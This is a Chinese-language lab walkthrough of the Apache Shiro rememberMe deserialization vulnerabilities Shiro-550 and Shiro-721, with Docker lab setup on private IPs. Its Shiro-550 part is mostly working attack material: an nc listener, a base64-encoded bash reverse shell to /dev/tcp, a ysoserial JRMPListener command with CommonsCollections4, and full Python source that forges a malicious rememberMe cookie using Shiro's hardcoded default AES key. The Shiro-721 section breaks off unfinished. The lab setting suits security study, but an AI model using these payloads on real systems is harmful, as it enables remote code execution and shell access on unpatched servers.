0x00. Apache Shiro介绍
Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理,可用于保护任何应用程序的安全。
Shiro提供了应用程序安全性API来执行以下方面:
1)身份验证:证明用户身份,通常称为用户‘登录’;
2)授权:访问控制;
3)密码术:保护或隐藏数据以防窥视;
4)会话管理:每个用户的时间敏感状态。
上述四个方面也被称为应用程序安全性的四个基石。
Shiro还支持一些辅助功能,例如Web应用程序安全性,单元测试和多线程支持,它们的存在也是为了加强上述四个方面。
0x01. Shiro rememberMe反序列化漏洞(Shiro-550)
一、漏洞原理
Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操作。服务器端识别身份解密处理cookie的流程则是:
获取rememberMe cookie ->base64 解码->AES解密(加密密钥硬编码)->反序列化(未作过滤处理)。但是AES加密的密钥Key被硬编码(密钥初始就被定义好不能动态改变的)在代码里,这就意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者可以构造一个恶意的对象,并且对其序列化、AES加密、base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终就造成了反序列化的RCE漏洞。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都可能会导致该漏洞的产生.硬编码是将数据直接嵌入到程序或其他可执行对象的源代码中。如果在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,那么就可能存在此漏洞。
Payload产生的过程:
命令 => 序列化 => AES加密 => base64编码 => RememberMe Cookie值
在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。
二、影响版本
Apache Shiro <= 1.2.4(需要获取AES秘钥)
三、特征判断
返回包中包含rememberMe=deleteMe字段
四、漏洞环境搭建
靶机环境:Cento7(192.168.110.143)、tomcat:8-jre8
攻击机环境:Kali(192.168.110.140)、Win10(192.168.79.189)
启动docker:systemctl start docker
获取docker镜像:docker pull medicean/vulapps:s_shiro_1
启动docker镜像: docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1
五、漏洞利用
1. 检测是否存在默认的key及漏洞
这里我们使用 Shiro_exploit,获取key
Github项目地址:https://github.com/insightglacier/Shiro_exploit
使用脚本出现该问题:ImportError: No module named Crypto.Cipher
安装模块:pip install pycryptodome
注意如果安装模块出现问题,解决方式如下
第一种解决方式:
看到这一行:error: Microsoft Visual C++ 9.0 is required. Get it from http://aka.ms/vcpython发现少了个插件;然后就去下载;
官网下载地址:https://www.microsoft.com/en-us/download/confirmation.aspx?id=44266
第二种解决方式:
python安装目录下的\Lib\site-packages,将crypto文件夹的名字改成Crypto。
开始检测
python2 shiro_exploit.py -u http://192.168.110.143:8080/
表示存在漏洞,并且key在右边
2. 进行漏洞利用
2.1. 制作反弹shell代码
2.1.1. kali监听本地端口
nc -lvvp 9999
2.1.2. Java Runtime 配合 bash 编码,
在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
bash -i >& /dev/tcp/192.168.110.140/9999 0>&1
编码后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xNDAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
2.2. 通过ysoserial中JRMP监听模块,监听6666端口并执行反弹shell命令。
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xNDAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
2.3. 使用shiro.py 生成Payload
python2 shiro.py 192.168.79.189:6666
shiro.py中代码
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())
2.4. 构造数据包发送Payload
认证失败时会设置deleteMe的cookie
win10上的ysoserial
kali linux上的监听
0x02.Shiro rememberMe反序列化漏洞(Shiro-721)
一、漏洞原理
rememberMe cookie通过AES-128-CBC模式加密,易受到Padding Oracle攻击。可以通过结合有效的rememberMe cookie作为Padding Oracle攻击的前缀,然后精⼼制作rememberMe来进⾏反序列化攻击。
Tip:在1.2.4版本后,shiro已经更换 AES-CBC AES-CBC 为 AES-GCM AES-GCM ,无法再通过Padding Oracle遍历key。
二、影响版本
Apache Shiro <= 1.4.1(需要一个合法的登录账号,基于Padding Oracle attack来实现的攻击)
三、特征判断
由于漏洞利用需要一个合法的登录账号,这里利用账号正常登陆获取一个有效的rememberMe cookie,并记录下这个rememberMe的值。
四、漏洞环境搭建
靶机环境:Cento7(192.168.110.143)、tomcat:8-jre8
攻击机环境:Kali(192.168.110.140)、Win10(192.168.79.189)
git clone https://github.com/inspiringz/Shiro-721.git
cd Shiro-721/Docker
docker build -t shiro-721 .
docker run -p 8080:8080 -d shiro-721
五、漏洞利用
1. 登录 Shiro 测试账户获取合法 Cookie(勾选Remember Me)
明天补上